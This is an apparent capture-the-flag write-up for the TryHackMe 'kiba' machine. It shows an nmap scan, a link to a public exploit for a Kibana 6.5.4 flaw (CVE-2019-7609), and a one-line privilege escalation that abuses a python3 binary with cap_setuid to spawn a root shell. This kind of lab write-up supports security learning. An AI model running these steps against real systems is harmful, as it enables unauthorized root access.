# CTF TryHackMe - kiba

## Nmap
```bash
# Nmap 7.91 scan initiated Wed Sep  1 17:21:00 2021 as: nmap -sC -sV -p- -oN nmap_allports.log 10.10.74.223
Nmap scan report for 10.10.74.223
Host is up (0.067s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE      VERSION
22/tcp   open  ssh          OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 9d:f8:d1:57:13:24:81:b6:18:5d:04:8e:d2:38:4f:90 (RSA)
|   256 e1:e6:7a:a1:a1:1c:be:03:d2:4e:27:1b:0d:0a:ec:b1 (ECDSA)
|_  256 2a:ba:e5:c5:fb:51:38:17:45:e7:b1:54:ca:a1:a3:fc (ED25519)
80/tcp   open  http         Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
5044/tcp open  lxi-evntsvc?
5601/tcp open  esmagent?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
|     HTTP/1.1 400 Bad Request
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     kbn-name: kibana
|     kbn-xpack-sig: c4d007a8c4d04923283ef48ab54e3e6c
|     content-type: application/json; charset=utf-8
|     cache-control: no-cache
|     content-length: 60
|     connection: close
|     undefined: undefined
|     Date: Wed, 01 Sep 2021 15:41:58 GMT
|     {"statusCode":404,"error":"Not Found","message":"Not Found"}
```

Okay, so it seem we have Kibana running on port 5601, lets visit it !
If we go to the **management tab**, we can see the version : **Version: 6.5.4**

## Searching an exploit

Googling for an exploit, and we got this github : https://github.com/mpgn/CVE-2019-7609
Just follow the differents step, and we are in :D

## Time to privEsc
Now trying to privsec, we can use the **getcap -r /** command to recursively list all of the kiba's capabilities

```bash
getcap -r / 2>/dev/null
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
```

So, we have suid on python3. We can exploit this to privesc :
```bash
/home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/bash");'
```
And we'rrr root
